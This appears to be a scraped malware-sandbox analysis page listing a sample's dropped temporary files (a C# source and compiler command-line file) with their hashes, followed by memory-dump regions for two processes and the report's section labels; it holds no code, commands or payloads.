\??\c:\Users\Admin\AppData\Local\Temp\xzruf31e\xzruf31e.0.cs

Filesize
1KB

MD5
7148f5de8c55f6d59474cf82b9687f56

SHA1
9308a39aa78872f5d4988a0abb5fa40c06e4c652

SHA256
1f403cb45600f7dbebe8d7d248c4059bfa0c0606340cede2376ff3c596e44820

SHA512
39da13dcd9fa22e0b7fa63355f61766508f4621bd2d0ea276c6fc528b24083722dce6435cff266987897ee803c7ad2c80d6164dc8d80bd59c57fa46d630d59eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xzruf31e\xzruf31e.cmdline

Filesize
369B

MD5
94d60670c6a9660ade6aad2d1ab53d33

SHA1
617b09dde58e941e135b60e3612b5e0c67fd25d0

SHA256
c1c6e35d01042bddf99d6b513659a83b532e36fd3fea843aa09a84348ada78fd

SHA512
7ac5e3d8b2bb0d89948ba834a5baf20428346192ab8b574d991fc8cad0a2dc869e7f246b81e1e52bd2166a8da38393ede39a78af7ebef483cc76881030ca2995

Download Submit
memory/4256-165-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4256-159-0x00007FFD8B1F0000-0x00007FFD8B3E5000-memory.dmp

Filesize
2.0MB

Download
memory/4256-160-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/4256-161-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/4256-162-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4256-169-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4256-170-0x00007FFD8B1F0000-0x00007FFD8B3E5000-memory.dmp

Filesize
2.0MB

Download
memory/4256-171-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/4256-158-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/4256-157-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/4256-156-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/5100-140-0x0000000006F90000-0x0000000006FAA000-memory.dmp

Filesize
104KB

Download
memory/5100-152-0x0000000007C00000-0x000000000827A000-memory.dmp

Filesize
6.5MB

Download
memory/5100-153-0x00007FFD8B1F0000-0x00007FFD8B3E5000-memory.dmp

Filesize
2.0MB

Download
memory/5100-154-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/5100-151-0x0000000007C00000-0x000000000827A000-memory.dmp

Filesize
6.5MB

Download
memory/5100-150-0x0000000008EB0000-0x0000000009454000-memory.dmp

Filesize
5.6MB

Download
memory/5100-149-0x0000000007D00000-0x0000000007D22000-memory.dmp

Filesize
136KB

Download
memory/5100-148-0x0000000007DA0000-0x0000000007E36000-memory.dmp

Filesize
600KB

Download
memory/5100-139-0x0000000008280000-0x00000000088FA000-memory.dmp

Filesize
6.5MB

Download
memory/5100-138-0x0000000006980000-0x000000000699E000-memory.dmp

Filesize
120KB

Download
memory/5100-137-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/5100-136-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/5100-135-0x0000000005A20000-0x0000000005A42000-memory.dmp

Filesize
136KB

Download
memory/5100-134-0x0000000005B30000-0x0000000006158000-memory.dmp

Filesize
6.2MB

Download
memory/5100-133-0x00000000053D0000-0x0000000005406000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads